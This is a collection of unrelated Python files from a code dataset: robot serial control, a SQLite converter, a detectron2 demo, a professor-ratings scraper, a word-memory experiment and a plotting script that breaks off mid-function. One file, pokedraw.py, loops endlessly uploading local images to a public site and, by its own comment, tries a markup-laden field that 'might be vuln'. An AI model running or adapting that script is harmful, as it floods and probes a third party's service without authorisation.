the cdi list \n that is made after calling movethebot() which get the path from move function and directions using\n get direction function. getdirection function uses the function compass to generate a list cdi\n that is being used here to command the robot using ser variable. The delay given in this function is \n due to the reading that are to be obtained from the white line sensor. if we don't keep delay the \n robot will skip that node.\n\"\"\"\n\n\ndef run1():\n for i in range(len(allmoves) - 1):\n if ser.isOpen():\n if cdi[i] == \"ltup\":\n\n ser.write(\"a\".encode())\n # time.sleep(0.25)\n\n while True:\n data = ser.read(1)\n # print(data)\n if data == b\"o\":\n # print(data)\n break\n time.sleep(0.20)\n ser.write(\"w\".encode())\n elif cdi[i] == \"rtup\":\n ser.write(\"d\".encode())\n # time.sleep(0.25)\n # print('rtupsdasdaasd')\n while True:\n data = ser.read(1)\n # print(data)\n if data == b\"o\":\n # print(data)\n break\n time.sleep(0.20)\n ser.write(\"w\".encode())\n # time.sleep(0.55)\n elif cdi[i] == \"lt2up\" or cdi[i] == \"rt2up\":\n ser.write(\"a\".encode())\n # print('hiiio')\n time.sleep(0.25)\n ser.write(\"k\".encode())\n time.sleep(0.25)\n ser.write(\"k\".encode())\n time.sleep(0.25)\n ser.write(\"a\".encode())\n while True:\n data = ser.read(1)\n # print(data)\n if data == b\"o\":\n # print(data)\n break\n time.sleep(0.20)\n ser.write(\"w\".encode())\n time.sleep(0.55)\n elif cdi[i] == \"rt2up\":\n ser.write(\"a\".encode())\n time.sleep(0.25)\n ser.write(\"k\".encode())\n time.sleep(0.25)\n ser.write(\"a\".encode())\n\n while True:\n data = ser.read(1)\n # print(data)\n if data == b\"o\":\n # print(data)\n break\n time.sleep(0.20)\n ser.write(\"w\".encode())\n time.sleep(0.55)\n ser.write(\"j\".encode())\n # print(allmoves[i], allmoves[i+1])\n time.sleep(1)\n\n\n\"\"\"\nFunction Name : clearBuffer()\nInput: None\nOutput: None\nPurpose: this function clears all the global variable after every move except for the premove\n\"\"\"\n\n\ndef clearBuffer():\n global dii, cdi, allmoves\n dii = []\n cdi = []\n # premove=[]\n allmoves = []\n\n\n\"\"\"\nFunction Name : bhagna()\nInput: i-current positions of x axis,j-current position of j axis,k & l- Destination points\nOutput: None\nPurpose: This functions call movethebot and then clearBuffer so this functions can be used directly for\n continious nd nonstop movements. we cannot clear premove once the robot has started , and to keep\n that goal this function is used. \n\"\"\"\n\n\ndef bhagna(i, j, k, l):\n movethebot(i, j, k, l)\n print(\"allmoves\")\n print(allmoves)\n print(\"cdi\")\n print(cdi)\n # print('dii')\n # print(dii)\n clearBuffer()\n\n\n\"\"\"\nFunction Name : mad()---- Move at destination \nInput: axes- the axes mentioned in the polygons , pm= premove\nOutput: None\nPurpose: This functions is used to move the bot for picking up the pebble after reaching the destination\n node with the help of previous move. This functions take two arguments axes and pm. In axes one\n needs to mention the axes to which he want to drop or pick the pebble. In the pm it should be \n given the list of premoves. So now it has the list of previous moves and the axes.It will \n then see what sequence of moves it should follow to get to the axes based on the pattern \n of the axes nd the previous moves. Once the moves are done then the id of sequence pattern\n is appended into the predir(this will be used to revert the movements and bring back robot in\n the same position by rvrt function). \n\"\"\"\n\n\ndef mad(axes, pm):\n if axes == \"1-1\":\n if pm[-1] == \"up\" or pm[-1] == \"dn\":\n ser.write(\"f\".encode())\n time.sleep(0.15)\n ser.write(\"j\".encode())\n predir.append(1)\n elif pm[-1] == \"ltup\" or pm[-1] == \"rtdn\":\n ser.write(\"a\".encode())\n time.sleep(0.25)\n ser.write(\"y\".encode())\n time.sleep(0.4)\n ser.write(\"j\".encode())\n time.sleep(0.1)\n ser.write(\"f\".encode())\n time.sleep(0.1)\n ser.write(\"j\".encode())\n predir.append(2)\n elif pm[-1] == \"ltdn\" or pm[-1] == \"rtup\":\n ser.write(\"d\".encode())\n time.sleep(0.25)\n ser.write(\"u\".encode())\n time.sleep(0.4)\n ser.write(\"j\".encode())\n time.sleep(0.1)\n ser.write(\"f\".encode())\n time.sleep(0.1)\n ser.write(\"j\".encode())\n predir.append(3)\n elif axes == \"2-2\":\n if pm[-1] == \"up\" or pm[-1] == \"dn\":\n ser.write(\"a\".encode())\n time.sleep(0.25)\n ser.write(\"y\".encode())\n time.sleep(0.4)\n ser.write(\"j\".encode())\n time.sleep(0.1)\n ser.write(\"f\".encode())\n time.sleep(0.1)\n ser.write(\"j\".encode())\n predir.append(2)\n elif pm[-1] == \"ltup\" or pm[-1] == \"rtdn\":\n ser.write(\"d\".encode())\n time.sleep(0.25)\n ser.write(\"u\".encode())\n time.sleep(0.4)\n ser.write(\"j\".encode())\n time.sleep(0.25)\n ser.write(\"f\".encode())\n time.sleep(0.1)\n ser.write(\"j\".encode())\n predir.append(3)\n elif pm[-1] == \"ltdn\" or pm[-1] == \"rtup\":\n ser.write(\"f\".encode())\n time.sleep(0.15)\n ser.write(\"j\".encode())\n predir.append(1)\n elif axes == \"3-3\":\n if pm[-1] == \"up\" or pm[-1] == \"dn\":\n ser.write(\"d\".encode())\n time.sleep(0.25)\n ser.write(\"u\".encode())\n time.sleep(0.4)\n ser.write(\"j\".encode())\n time.sleep(0.25)\n ser.write(\"f\".encode())\n time.sleep(0.1)\n ser.write(\"j\".encode())\n predir.append(3)\n elif pm[-1] == \"ltup\" or pm[-1] == \"rtdn\":\n ser.write(\"f\".encode())\n time.sleep(0.15)\n ser.write(\"j\".encode())\n predir.append(1)\n elif pm[-1] == \"ltdn\" or pm[-1] == \"rtup\":\n print(\"hiii\")\n ser.write(\"a\".encode())\n time.sleep(0.25)\n ser.write(\"y\".encode())\n time.sleep(0.4)\n ser.write(\"f\".encode())\n time.sleep(0.1)\n ser.write(\"j\".encode())\n predir.append(2)\n ser.write(\"j\".encode())\n time.sleep(1.25)\n\n\n\"\"\"\nFunction Name : rvrt() \nInput: pd=predir\nOutput: None\nPurpose: This functions is used to get the robot back in the position after picking up the pebble. \n basically for alignment. This function takes pd as an argument which is a list of predir.It \n contains the record of the movements done at mad and then it reverses all the movements and then \n the robot comes back to its original position. \n\"\"\"\n\n\ndef rvrt(pd):\n if pd[-1] == 1:\n ser.write(\"z\".encode())\n time.sleep(0.15)\n ser.write(\"j\".encode())\n if pd[-1] == 2:\n ser.write(\"z\".encode())\n time.sleep(0.15)\n ser.write(\"j\".encode())\n ser.write(\"d\".encode())\n time.sleep(0.15)\n ser.write(\"u\".encode())\n time.sleep(0.5)\n ser.write(\"j\".encode())\n if pd[-1] == 3:\n ser.write(\"z\".encode())\n time.sleep(0.15)\n ser.write(\"j\".encode())\n ser.write(\"a\".encode())\n time.sleep(0.15)\n ser.write(\"y\".encode())\n time.sleep(0.5)\n ser.write(\"j\".encode())\n ser.write(\"j\".encode())\n time.sleep(1.25)\n","sub_path":"Python Code/bot_move.py","file_name":"bot_move.py","file_ext":"py","file_size_in_byte":31982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"154789539","text":"#!python3\n#encoding:utf-8\nclass Json2Sqlite(object):\n def __init__(self):\n pass\n\n def BoolToInt(self, bool_value):\n# print('引数はbool型のみ有効ですが、渡された引数の型は {0}, 値は {1} です。'.format(type(bool_value), bool_value))\n if not isinstance(bool_value, bool):\n raise Exception('引数はbool型のみ有効ですが、渡された引数の型は {0}, 値は {1} です。'.format(type(bool_value), bool_value))\n if True == bool_value:\n return 1\n else:\n return 0\n def IntToBool(self, int_value):\n if not isinstance(int_value, int):\n raise Exception('引数はint型のみ有効ですが、渡された引数の型は {0}, 値は {1} です。'.format(type(bool_value), bool_value))\n if 0 == int_value:\n return False\n else:\n return True\n\n def ArrayToString(self, array):\n if not isinstance(array, list):\n raise Exception('引数はlist型のみ有効ですが、渡された引数の型は {0}, 値は {1} です。'.format(type(bool_value), bool_value))\n if None is array or 0 == len(array):\n return None\n ret = \"\"\n for v in array:\n ret += str(v) + ','\n# ret += v + ','\n# print(ret)\n# print(ret[:-1])\n return ret[:-1]\n def StringToArray(self, string):\n if not isinstance(string, str):\n raise Exception('引数はstr型のみ有効ですが、渡された引数の型は {0}, 値は {1} です。'.format(type(bool_value), bool_value))\n if None is string or 0 == len(string):\n return None\n array = []\n for item in string.split(','):\n# for item in string.sprit(','):\n# if 0 < len(item):\n if 0 < len(item.strip()):\n array.append(item)\n return array\n","sub_path":"web/sqlite/Json2Sqlite.py","file_name":"Json2Sqlite.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"234328817","text":"import atexit\nimport bisect\nimport multiprocessing as mp\nfrom collections import deque\nimport cv2\nimport torch\nimport argparse\nimport glob\nimport os\n\nfrom detectron2.data import MetadataCatalog\nfrom detectron2.engine.defaults import DefaultPredictor\nfrom detectron2.utils.video_visualizer import VideoVisualizer\nfrom detectron2.utils.visualizer import ColorMode, Visualizer\nfrom detectron2.config import get_cfg\nfrom detectron2.data.detection_utils import read_image\nfrom detectron2.utils.logger import setup_logger\n\ndef setup_cfg(args):\n # load config from file and command-line arguments\n cfg = get_cfg()\n cfg.merge_from_file(args.config_file)\n cfg.merge_from_list(args.opts)\n # Set score_threshold for builtin models\n cfg.MODEL.RETINANET.SCORE_THRESH_TEST = args.confidence_threshold\n cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = args.confidence_threshold\n cfg.MODEL.PANOPTIC_FPN.COMBINE.INSTANCES_CONFIDENCE_THRESH = args.confidence_threshold\n cfg.freeze()\n return cfg\ndef get_parser():\n parser = argparse.ArgumentParser(description=\"Detectron2 demo for builtin models\")\n parser.add_argument(\n \"--config-file\",\n default=\"configs/quick_schedules/mask_rcnn_R_50_FPN_inference_acc_test.yaml\",\n metavar=\"FILE\",\n help=\"path to config file\",\n )\n parser.add_argument(\n \"--output\",\n help=\"A file or directory to save output visualizations. \"\n \"If not given, will show output in an OpenCV window.\",\n )\n parser.add_argument(\n \"--input\",\n help=\"A file or directory to save output visualizations. \"\n \"If not given, will show output in an OpenCV window.\",\n )\n\n parser.add_argument(\n \"--confidence-threshold\",\n type=float,\n default=0.5,\n help=\"Minimum score for instance predictions to be shown\",\n )\n parser.add_argument(\n \"--opts\",\n help=\"Modify config options using the command-line 'KEY VALUE' pairs\",\n default=[],\n nargs=argparse.REMAINDER,\n )\n return parser\n\n\nclass VisualizationDemo(object):\n def __init__(self, cfg, instance_mode=ColorMode.IMAGE, parallel=False):\n \"\"\"\n Args:\n cfg (CfgNode):\n instance_mode (ColorMode):\n parallel (bool): whether to run the model in different processes from visualization.\n Useful since the visualization logic can be slow.\n \"\"\"\n self.metadata = MetadataCatalog.get(\n cfg.DATASETS.TEST[0] if len(cfg.DATASETS.TEST) else \"__unused\"\n )\n self.cpu_device = torch.device(\"cpu\")\n self.instance_mode = instance_mode\n\n self.parallel = parallel\n self.predictor = DefaultPredictor(cfg)\n\n def run_on_image(self, image):\n \"\"\"\n Args:\n image (np.ndarray): an image of shape (H, W, C) (in BGR order).\n This is the format used by OpenCV.\n Returns:\n predictions (dict): the output of the model.\n vis_output (VisImage): the visualized image output.\n \"\"\"\n vis_output = None\n predictions = self.predictor(image)\n # Convert image from OpenCV BGR format to Matplotlib RGB format.\n image = image[:, :, ::-1]\n visualizer = Visualizer(image, self.metadata, instance_mode=self.instance_mode)\n visualizer_sem = Visualizer(image, self.metadata, instance_mode=self.instance_mode)\n visualizer_ins = Visualizer(image, self.metadata, instance_mode=self.instance_mode)\n if \"panoptic_seg\" in predictions:\n panoptic_seg, segments_info = predictions[\"panoptic_seg\"]\n vis_output = visualizer.draw_panoptic_seg_predictions(\n panoptic_seg.to(self.cpu_device), segments_info\n )\n vis_output_sem = visualizer_sem.draw_pan_sem_predictions(\n panoptic_seg.to(self.cpu_device), segments_info\n )\n vis_output_ins= visualizer_ins.draw_pan_ins_predictions(\n panoptic_seg.to(self.cpu_device), segments_info\n )\n return vis_output, vis_output_sem, vis_output_ins\n \nif __name__ == \"__main__\": \n args = get_parser().parse_args()\n setup_logger(name=\"fvcore\")\n logger = setup_logger()\n logger.info(\"Arguments: \" + str(args))\n\n cfg = setup_cfg(args)\n\n demo = VisualizationDemo(cfg)\n img_path = args.input # path to image\n img_list = os.listdir(img_path)\n save_path = args.output\n for im in img_list:\n img = read_image(os.path.join(img_path,im), format=\"BGR\")\n pan, sem, ins = demo.run_on_image(img)\n pan.save(os.path.join(save_path,'{}_pan.png'.format(im[:-4])))\n sem.save(os.path.join(save_path,'{}_sem.png'.format(im[:-4])))\n ins.save(os.path.join(save_path,'{}_ins.png'.format(im[:-4])))\n","sub_path":"demo/pan_vis.py","file_name":"pan_vis.py","file_ext":"py","file_size_in_byte":4814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"366513351","text":"# this script is for scraping ALL OSU and PSU statistics teacher ratings\n# (not just overall average)\n# note: you have to close the cookies pop-up yourself each time a new teacher page is loaded\nimport pandas as pd\nimport requests\nimport re\nimport time\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\n\ndef get_all_ratings(prof_id):\n # this function gets all the overall ratings for a teacher and outputs a dataframe\n # for >20 ratings\n if all_profs[all_profs.id == prof_id].tNumRatings.iloc[0] > 20:\n #use selenium to access page\n page = 'https://www.ratemyprofessors.com/ShowRatings.jsp?tid=' + str(prof_id)\n driver = webdriver.Firefox(executable_path = '/usr/local/bin/geckodriver')\n driver.get(page)\n \n # load more ratings\n while True:\n try:\n loadMoreButton = driver.find_element_by_id('loadMore')\n time.sleep(2)\n loadMoreButton.click()\n time.sleep(5)\n except Exception as e:\n print(e)\n break\n print(f'ID {prof_id} Complete')\n time.sleep(2)\n page_source = driver.page_source\n driver.close()\n # for <20 ratings\n else:\n page = requests.get('https://www.ratemyprofessors.com/ShowRatings.jsp?tid=' + str(prof_id))\n page_source = page.content\n \n # parse/extract results\n soup = BeautifulSoup(page_source, 'html.parser')\n ratings_raw = soup.find_all('span', attrs = {'class' : re.compile('^score (?!.*inverse).*')})\n ratings = [re.findall(r'[1-5]', str(line)) for line in ratings_raw]\n ratings = [num[0] for num in ratings]\n \n return pd.DataFrame({'tid': prof_id, 'ratings': ratings})\n\ndef create_ratings_df(list_of_ids):\n # this function gets all the overall ratings for all teachers and outputs a dataframe\n dfs = [get_all_ratings(num) for num in list_of_ids]\n return pd.concat(dfs)\n\n# create df, write out to csv\nall_ratings = create_ratings_df(all_profs.id)\nall_ratings.to_csv('/Users/msieviec/Python/osu v psu/all_ratings.csv', index = False)","sub_path":"get_teacher_ratings.py","file_name":"get_teacher_ratings.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"477237919","text":"#!/usr/bin/python\nimport itertools as it, glob\nfrom time import sleep\nimport requests\nimport base64\nimport re\n\nass = requests.session() #hehe ass\nbutts = ('*.jpg','*.png','*.jpeg') #hehe butts\n\ndef lolis(*patterns): #Makes it easier to list files in current directory also hehe lolis\n return it.chain.from_iterable(glob.glob(pattern) for pattern in patterns) \n\ndef suck(image): #hehe suck\n try:\n response = ass.post(\n url=\"http://www.pokedraw.net/ajax/saveImage\",\n data={\"pokemon\":\"

Smug anime girl

\", # We can set our own Pokemon name. hint hint might be vuln to something\n \"browser\":\"I DONT USE A BROWSER\", # What browser we use\n \"browser_version\":\"69\", # What version is the browser?\n \"imgBase64\":base64.encodestring(open(image, \"rb\").read()) #Converts image to base64 string.\n })\n except Exception as e:\n print(\"Error uploading {0}\".format(e))\n exit()\n else:\n print(response.text)\n\nif __name__ == '__main__':\n while True: \n sleep(1)\n for dicks in lolis('*.jpg','*.png','*.jpeg') :#hehe\n suck(dicks) #hehhhh\n","sub_path":"pokedraw.py","file_name":"pokedraw.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"633400919","text":"## This file contains the class PresentWords, as used in the main timed word presenter program.\n## Word is its own class (instead of a list of strings) to allow for easy modifications \n\n## Written By: Michael Carter, Oct./Nov. 2019\n## For my PSYCO 403/505 research project\n\n\nfrom numpy import random\nimport pygame as pg\nfrom pygame.locals import *\n\nfrom uagame import Window\nfrom word import Word\nimport time\nfrom results import ResultsFile\n\n\n## TEST PARAMETERS ##\nWORDS_FILENAME = 'testwords.txt'\nWINDOW_SIZE = (700, 500)\nDEFAULT_FONT_COLOR = \"gray\"\nDEFAULT_FONT_SIZE = 36\nDEFAULT_FONT_NAME = \"Arial\"\nBG_COLOR = \"gray50\"\n\n\nclass PresentWords:\n \"\"\"\n This class includes everything required for a single word presentation task.\n word_list is a list of objects of class Word.\n \"\"\"\n @classmethod\n def set_word_lib(cls, word_lib):\n cls.word_lib = word_lib \n @classmethod\n def set_window(cls, window_from_parent):\n cls.window = window_from_parent\n @classmethod\n def set_results_file(cls, results_file):\n cls.results = results_file\n\n def __init__(self, num_words, present_time, delay_time, is_colored=False):\n self.__is_colored = is_colored\n self.__present_time = present_time\n self.__delay_time = delay_time\n self.__num_words = num_words\n \n self.__word_list = []\n self.__quit = False\n self.__space_pressed = False\n \n self.__clock = pg.time.Clock()\n self.__timer_wd = DisplayTimer()\n self.__timer_bl = DisplayTimer()\n\n self.generate_rand_word_list()\n self.__window = PresentWords.window\n \n self.__write_to_results() \n self.run()\n\n def run(self):\n # runs the presenter for one word list\n self.__initialize_window()\n self.__display_instructions() \n self.__display_countdown()\n \n self.__timer_bl.reset()\n self.__timer_wd.reset()\n \n for word in self.__word_list: \n next = False\n while not self.__quit and not next:\n self.__check_events()\n next = self.__display_next(word)\n self.__window.update()\n self.__clock.tick(30)\n\n def __initialize_window(self):\n # sets all the window's parameters to the ones relevant to the class.\n self.__clock.tick(30)\n self.__window.set_bg_color(BG_COLOR)\n self.__window.set_font_color(DEFAULT_FONT_COLOR)\n self.__window.clear()\n self.__window.update()\n \n def __write_to_results(self):\n # writes the info to the header of the results file\n PresentWords.results.new_trial_header(self.__word_list, \n self.__present_time, \n self.__delay_time, \n self.__is_colored)\n \n def __check_events(self): \n # handle user inputs\n for event in pg.event.get():\n if event.type == QUIT:\n self.__handle_quit()\n \n if event.type == KEYUP:\n if event.key == pg.K_SPACE:\n self.__space_pressed = True\n else: \n self.__space_pressed = False # \"flip the switch\" back\n\n def __handle_quit(self):\n self.__quit = True\n \n #self.__window.close()\n \n def generate_rand_word_list(self):\n # Generates the word_list by randomly picking num_words from word_lib.\n try:\n for i in range(self.__num_words):\n r = random.randint(0, len(PresentWords.word_lib))\n self.__word_list.append(PresentWords.word_lib.pop(r))\n #self.__word_list.append(random.choice(PresentWords.word_lib, replace=False)) \n except ValueError:\n print(\"Value Error: Insufficient words given\") \n \n def __display_next(self,word):\n # displays the next word for present_time, followed by a blank screen for delay_time \n if not self.__timer_wd.been_longer_than(self.__present_time):\n self.__display_word(word)\n self.__timer_bl.reset()\n else:\n self.__display_blank() \n if self.__timer_bl.been_longer_than(self.__delay_time):\n self.__timer_wd.reset()\n return True\n return False\n\n def __display_blank(self):\n self.__window.clear()\n\n def __display_word(self,word):\n word.set_window(self.__window)\n word.draw_word(self.__is_colored)\n \n def __display_instructions(self):\n # Draws each line of each page to the display. \n # Pages are advanced by a spacebar press.\n self.__window.set_font_color(DEFAULT_FONT_COLOR)\n self.__window.set_font_size(DEFAULT_FONT_SIZE)\n print(\"Displaying Presentation Instructions\")\n \n instructions = [ \n # Page 1\n [\"This is a test of word memory.\", \" \", \n \"%d concrete nouns will be presented\" % (self.__num_words), \n \"for %d second(s) at a time,\" % (self.__present_time),\n \"with %d second(s) in between.\" % (self.__delay_time),\n \" \", \"Press Space to Continue\"],\n # Page 2\n [\"Afterwards, you will be prompted\",\n \"to recall the words in order.\", \n \" \", \"Press Space to Continue\"],\n # Page 3\n [\"Press Space to Start\"] ]\n \n for i, page in enumerate(instructions):\n self.__space_pressed = False\n while not self.__space_pressed:\n # draw the page counter\n counter = \"%d/%d\" % (i+1, len(instructions))\n self.__window.draw_string(counter, \n self.__window.get_width() - self.__window.get_string_width(counter),\n self.__window.get_height() - self.__window.get_font_height())\n # draw each line\n for j, line in enumerate(page):\n x, y = self.__find_string_x_y(line, j, len(page))\n self.__window.draw_string(line, x, y)\n \n self.__check_events() \n self.__window.clear() \n\n def __display_countdown(self):\n # currently just uses the time.sleep() method for the delay, \n # since it's not that big of a deal.\n countdown = [\"3...\",\"2...\",\"1...\"]\n for count_str in countdown:\n x,y = self.__find_string_x_y(count_str, 0)\n self.__window.draw_string(count_str, x, y)\n time.sleep(1)\n self.__window.clear()\n\n def __find_string_x_y(self, print_string, line_no, total_lines=1):\n # returns a tuple of the (x,y) position to draw the string at.\n x = (self.__window.get_width() - self.__window.get_string_width(print_string)) // 2\n y = ((self.__window.get_height() - (self.__window.get_font_height() * total_lines+1)) // 2) + (self.__window.get_font_height() * line_no)\n return (x,y)\n \nclass DisplayTimer:\n \"\"\" \n This class allows the events to be timed,\n to make decisions as to whether or not to progress.\n \"\"\" \n def __init__(self):\n self.__time_init = time.time() # current time in fractional seconds\n\n def reset(self):\n self.__time_init = time.time()\n\n def been_longer_than(self, check_seconds):\n # returns true if the timer has exceeded the check time.\n time_now = time.time()\n if self.__time_init < (time_now - check_seconds):\n return True\n else:\n return False \n\ndef main():\n \"\"\"Tests the Methods\"\"\"\n \n window = create_window()\n \n word_library = read_words_file(WORDS_FILENAME)\n PresentWords.set_word_lib(word_library) \n PresentWords.set_window(window) \n \n results_file = ResultsFile() \n PresentWords.set_results_file(results_file)\n \n # Present Words\n #test_1 = PresentWords(4, 5, 2, False) # (num_words, present_time, delay_time, is_colored (bool))\n test_2 = PresentWords(5, 3, 1, True) \n \ndef create_window():\n # Create a window for the game and open it.\n window = Window(\"Word Presenter\", WINDOW_SIZE[0], WINDOW_SIZE[1])\n window.set_bg_color(BG_COLOR)\n window.set_font_color(DEFAULT_FONT_COLOR)\n window.set_font_size(DEFAULT_FONT_SIZE)\n window.set_font_name(DEFAULT_FONT_NAME)\n window.clear()\n window.update()\n \n return window \n \n \ndef read_words_file(filename):\n # Read in the list of possible words.\n # Returns a list of objects of the Word class.\n word_list = []\n try:\t\t\n with open(filename,'r') as file:\n for input_word in file.readlines():\n word_list.append(Word(input_word.strip('\\n\\r')))\n assert len(word_list) > 0, \"word list cannot be empty\"\n except FileNotFoundError as e:\n print('Error: File not found! %s' % (e.strerror))\n return\n else:\t\t\n return word_list\n \n\nif __name__ == \"__main__\":\n main()\n ","sub_path":"Presenter_Program/presentwords.py","file_name":"presentwords.py","file_ext":"py","file_size_in_byte":9150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"577477296","text":"#!/usr/bin/env python\n\nfrom conference import ConferenceApi\nfrom google.appengine.api import app_identity\nfrom google.appengine.api import mail\nimport webapp2\n\n\"\"\"main.py\nDefines handlers for long running or asynchronous task performed by the cron.\n\"\"\"\n\n\nclass SetAnnouncementHandler(webapp2.RequestHandler):\n def get(self):\n \"\"\"\n Set Announcement in Memcache.\n \"\"\"\n ConferenceApi._cache_announcement()\n\n\nclass SendConfirmationEmailHandler(webapp2.RequestHandler):\n def post(self):\n \"\"\"\n Send email confirming Conference creation.\n \"\"\"\n mail.send_mail(\n 'noreply@%s.appspotmail.com' % (\n app_identity.get_application_id()), # from\n self.request.get('email'), # to\n 'You created a new Conference!', # subject\n 'Hi, you have created a following ' # body\n 'conference:\\r\\n\\r\\n%s' % self.request.get('conferenceInfo')\n )\n\n\napp = webapp2.WSGIApplication([\n ('/crons/set_announcement', SetAnnouncementHandler),\n ('/tasks/send_confirmation_email', SendConfirmationEmailHandler),\n], debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"247308260","text":"from matplotlib import pyplot as plt\nimport seaborn as sns\nimport matplotlib.patches as mpatches\nimport numpy as np\nfrom scipy import stats\nimport pandas as pd\nfrom AA_Index_Dictionary import get_scales\nfrom aaData.Original_Sequences import import_excel_seq as get_sequences\nfrom aaData.Original_Sequences import get_average_aa_distribution as av_destrib\nfrom aaData.Original_Sequences import get_average_length_and_count as av_length\nfrom aaData.Original_Sequences import AA_Group\nfrom xOld.Statistics_AUC import discrimination_via_AUC\nfrom abProcess.Profiles_Original_Sequences import profile_dictionary\nfrom acStatistics.Statistics_KS import get_value_count\nfrom acStatistics.Statistics_Significant_Scales import scale_filter\nfrom Configfile import *\nfrom Environment.file_parser import file_name\n\n# Basic Confignrations\nsns.set(color_codes=True)\nall_scales_df, aa_val = get_scales(file_aa, file_list, AA_code)\noutput_folder = results + \"adPlotting_Results/\"\n# description = AA_Group.aa_destribution_description(self, file)\n\n# I. General information for plotting\nsequence_value = av_length(file_sub, file_non_sub)\n## Get dicitonary of colors (classes Taylor)\npolar_neutral = {aa: \"green\" for aa in ['S', 'T', 'C', 'Q', 'N', 'Y']}\nnonpolar = {aa: \"orange\" for aa in ['P', 'M', 'A', 'L', 'I', 'V', 'W', 'F', 'G']}\nacid = {aa: \"red\" for aa in ['E', 'D']}\nbasic = {aa: \"blue\" for aa in ['H', 'R', 'K']}\nlist_dict = [nonpolar, acid, basic]\ncolor_dict = AA_Group.merge_dicts(polar_neutral, list_dict)\n## Get dictionary of aa classes\nclasses = AA_Group.aa_classes\n## Get significant scales\n\n\n# II. Figure Aestehtics\nsns.set_palette(\"bright\") # ?\n## Seaborn styles\nsns.set(color_codes=True)\nsns.set_style(\"whitegrid\")\n\n\n# 1. Plotting of amino acid distribution\ndef aa_destribution_barplot(file):\n \"\"\"\"Plotting of amino acid distribution\n in one dataset (e.g. all Substrates for Gammasecreatse)\"\"\"\n\n # 1. Data\n aa_distrib_tmd, aa_distrib_aa = av_destrib(file)\n values_percent = [i * 100 for i in aa_distrib_aa.values]\n # 3. Categorical Plot (Barplot)\n x = aa_distrib_aa.index\n y = values_percent\n ax = sns.barplot(x=x, y=y, palette=color_dict)\n # 4. Modification of Plot\n # 4.1 Axisgrid Object\n sns.despine()\n sns.set_context(\"paper\")\n plt.ylabel(\"Occurrence of amino acid [%]\")\n plt.xlabel(\"Amino acid\")\n ax.set_ylim([0, 20])\n # 4.2 Plot\n ## Get title\n name = file_name(file)\n title = \"Distribution of amino acids in \" + name\n plt.title(title, fontsize=10, fontweight='bold')\n ## Get legend (manually via mpatches)\n handles, labels = ax.get_legend_handles_labels()\n ax.legend(handles, labels)\n nonpolar = mpatches.Patch(color='orange', label='Nonploar')\n polar = mpatches.Patch(color='green', label='Polar')\n basic = mpatches.Patch(color='blue', label='Basic')\n acid = mpatches.Patch(color='red', label='Acid')\n plt.legend(handles=[nonpolar, polar, basic, acid],\n loc='upper right',\n fancybox=True, framealpha=1, frameon=True,\n title='AA Classification (by Taylor)',\n )\n # 4. Show Plot\n plt.savefig(output_folder + 'aaDistribution_in_' + name + '.png')\n plt.close()\n\n# 2. Plotting of Norm-Distribution (?)\ndef auc_distribution_displot(file_sub, file_non_sub):\n \"\"\"Plotting of distribution of auc \"\"\"\n AUC_df = discrimination_via_AUC(file_sub, file_non_sub)\n ratio_AUC = pd.Series(dict_ra_AUC)\n sns.distplot(ratio_AUC, rug=True, fit=stats.norm)\n plt.show()\n\n\n# Helper function for title\ndef split_title(a):\n if len(a) > 80:\n split = a[0:75]\n middle = a[75:].split(' ', 1)\n first = split + middle[0]\n last = middle[1]\n if '(' not in last and ')' in last:\n title = first + last\n else:\n title = first + '\\n' + last\n else:\n title = a\n return title\n\n\n# 3. Plotting AUC Profiles for top_scales\ndef profile_plot(file_sub, file_non_sub):\n \"\"\"Plot of aa_index profiles of sequences\n a) In: profile_dictionary\n b) Out: Plots of profiles\"\"\"\n significant_scales, top_scales, correlated_scales = scale_filter(file_sub, file_non_sub)\n id_sequence_sub, id_name_sub, df_sequence_sub = get_sequences(file_sub)\n id_sequence_non_sub, id_name_non_sub, df_sequence_non_sub = get_sequences(file_non_sub)\n sequence_value_sub = profile_dictionary(file_sub)\n sequence_value_non_sub = profile_dictionary(file_non_sub)\n sub_list = ['Notch2', 'CD44', 'BCMA']\n non_sub_list = ['DAP-12', 'NPR-A', 'GPA']\n for scale_id in top_scales: # sorted(sequence_value):\n # Create path and dictionary for top scales\n output = output_folder + 'AA_Profiles'\n os.makedirs(output, exist_ok=True)\n # Create subplots\n fig, ax = plt.subplots(2, 3, facecolor='w', edgecolor='k', sharey=True)\n\n # Create plots for substrates (new directory for non-substrate)\n i = 0\n for seq_id in sequence_value_sub[scale_id]:\n if id_name_sub[seq_id] in sub_list:\n y = sequence_value_sub[scale_id][seq_id][\"Values\"]\n x = np.arange(len(y))\n x_ticks_labels = sequence_value_sub[scale_id][seq_id][\"Sequence\"]\n ax[0, i].plot(x, y)\n ax[0, i].set_xticks(x)\n ax[0, i].set_xticklabels(x_ticks_labels, fontsize=6.5)\n ax[0, i].set_title(id_name_sub[seq_id],\n loc='center', fontsize=10,\n fontweight=\"bold\", color='blue')\n ax[0, i].grid(axis='x')\n i += 1\n else:\n pass\n j = 0\n for seq_id in sequence_value_non_sub[scale_id]:\n if id_name_non_sub[seq_id] in non_sub_list:\n y = sequence_value_non_sub[scale_id][seq_id][\"Values\"]\n x = np.arange(len(y))\n x_ticks_labels = sequence_value_non_sub[scale_id][seq_id][\"Sequence\"]\n ax[1, j].plot(x, y)\n ax[1, j].set_xticks(x)\n ax[1, j].set_xticklabels(x_ticks_labels, fontsize=6.5)\n ax[1, j].set_title(id_name_non_sub[seq_id],\n loc='center', fontsize=10,\n fontweight=\"bold\", color='red')\n ax[0, j].grid(axis='x')\n j += 1\n else:\n pass\n\n # Adjust subplot size\n fig.subplots_adjust(hspace=.50, wspace=.05, left=0.1, 